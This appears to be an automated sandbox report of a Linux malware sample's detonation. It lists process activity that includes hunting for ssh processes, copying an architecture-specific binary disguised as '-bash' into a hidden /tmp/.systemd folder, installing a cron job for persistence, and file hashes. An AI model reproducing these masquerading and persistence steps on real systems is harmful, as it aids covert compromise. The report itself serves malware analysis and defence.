File opened for reading /proc/729/cmdline /bin/ps N/A
File opened for reading /proc/732/stat /bin/ps N/A
File opened for reading /proc/9/status /bin/ps N/A
File opened for reading /proc/150/cmdline /bin/ps N/A
File opened for reading /proc/24/cmdline /bin/ps N/A
File opened for reading /proc/722/stat /bin/ps N/A
File opened for reading /proc/2/cmdline /bin/ps N/A
File opened for reading /proc/24/stat /bin/ps N/A
File opened for reading /proc/15/cmdline /bin/ps N/A
File opened for reading /proc/22/stat /bin/ps N/A
File opened for reading /proc/82/status /bin/ps N/A
File opened for reading /proc/345/stat /bin/ps N/A
File opened for reading /proc/9/cmdline /bin/ps N/A
File opened for reading /proc/13/status /bin/ps N/A
File opened for reading /proc/376/cmdline /bin/ps N/A
File opened for reading /proc/14/cmdline /bin/ps N/A
File opened for reading /proc/79/status /bin/ps N/A
File opened for reading /proc/732/cmdline /bin/ps N/A
File opened for reading /proc/318/status /bin/ps N/A
File opened for reading /proc/66/status /bin/ps N/A
File opened for reading /proc/368/stat /bin/ps N/A
File opened for reading /proc/105/cmdline /bin/ps N/A
File opened for reading /proc/70/status /bin/ps N/A
File opened for reading /proc/230/stat /bin/ps N/A
File opened for reading /proc/727/cmdline /bin/ps N/A
File opened for reading /proc/14/status /bin/ps N/A
File opened for reading /proc/19/status /bin/ps N/A
File opened for reading /proc/68/status /bin/ps N/A
File opened for reading /proc/9/cmdline /bin/ps N/A
File opened for reading /proc/741/status /bin/ps N/A
File opened for reading /proc/filesystems /bin/ps N/A
File opened for reading /proc/105/stat /bin/ps N/A
File opened for reading /proc/736/status /bin/ps N/A
File opened for reading /proc/12/status /bin/ps N/A
File opened for reading /proc/115/stat /bin/ps N/A
File opened for reading /proc/76/cmdline /bin/ps N/A
File opened for reading /proc/138/status /bin/ps N/A
File opened for reading /proc/15/status /bin/ps N/A
File opened for reading /proc/21/cmdline /bin/ps N/A
File opened for reading /proc/36/stat /bin/ps N/A
File opened for reading /proc/740/status /bin/ps N/A
File opened for reading /proc/78/stat /bin/ps N/A
File opened for reading /proc/657/stat /bin/ps N/A
File opened for reading /proc/115/stat /bin/ps N/A
File opened for reading /proc/698/cmdline /bin/ps N/A
File opened for reading /proc/716/cmdline /bin/ps N/A
File opened for reading /proc/11/cmdline /bin/ps N/A
File opened for reading /proc/6/cmdline /bin/ps N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/3/cmdline /bin/ps N/A
File opened for reading /proc/669/status /bin/ps N/A
File opened for reading /proc/660/cmdline /bin/ps N/A
File opened for reading /proc/76/stat /bin/ps N/A
File opened for reading /proc/36/stat /bin/ps N/A
File opened for reading /proc/78/status /bin/ps N/A
File opened for reading /proc/138/status /bin/ps N/A
File opened for reading /proc/376/stat /bin/ps N/A
File opened for reading /proc/16/cmdline /bin/ps N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/7/status /bin/ps N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cp N/A

Processes

/tmp/.systemd/.run

[/tmp/.systemd/.run]

/bin/grep

[grep ssh ]

/bin/grep

[grep -v R]

/bin/ps

[ps x]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/ps

[ps x]

/bin/grep

[grep ssh$]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/bin/grep

[grep sh$]

/usr/bin/awk

[awk {print $1}]

/bin/ps

[ps x]

/bin/uname

[uname -m]

/bin/cp

[cp -f -- .mips -bash]

/tmp/.systemd/-bash

[./-bash]

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/.systemd/auto]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.RBTJla /usr/bin/crontab N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/systemd.d /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/.systemd /tmp/.systemd/auto N/A

Processes

/tmp/.systemd/auto

[/tmp/.systemd/auto]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep .systemd]

/usr/bin/wc

[wc -l]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab systemd.d]

/bin/rm

[rm -rf systemd.d]

/bin/chmod

[chmod u+x .systemd]

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/var/spool/cron/crontabs/tmp.RBTJla

MD5 dbb47228523c48edfe60dda1b012f03d
SHA1 64adf38fbd662f2cdc856b0a1a1898d60d2e5c14
SHA256 0985d86b6a0b52111095135d4a0e5405848d42318445492d6540784bfc61f30e
SHA512 a720fc83063c925b735443be41ae8857d342c1a6dd64afe3463b6c9c64c35e4725641d3db5dd5ce7f22fc965e77d5218fb0903c592c51c777992e59b9419a287

/tmp/.systemd/.systemd

MD5 20abc8e72d4066c0565f7bbfad0fe526
SHA1 10cb464b8e9401cb3bfe17e059c957d79f4a93dd
SHA256 579de93e6119bdd4eb948bbdc32b0a3340bab93d4d0b5db723dbc5dddf82b09b
SHA512 9d849197900f20993624e5b713b24c72ffd269b078a7fc8574211258899bc70ddc85f00259d5f6aa3b032bcc0ec687524f042b6fed5e4fa96781d03a858ac977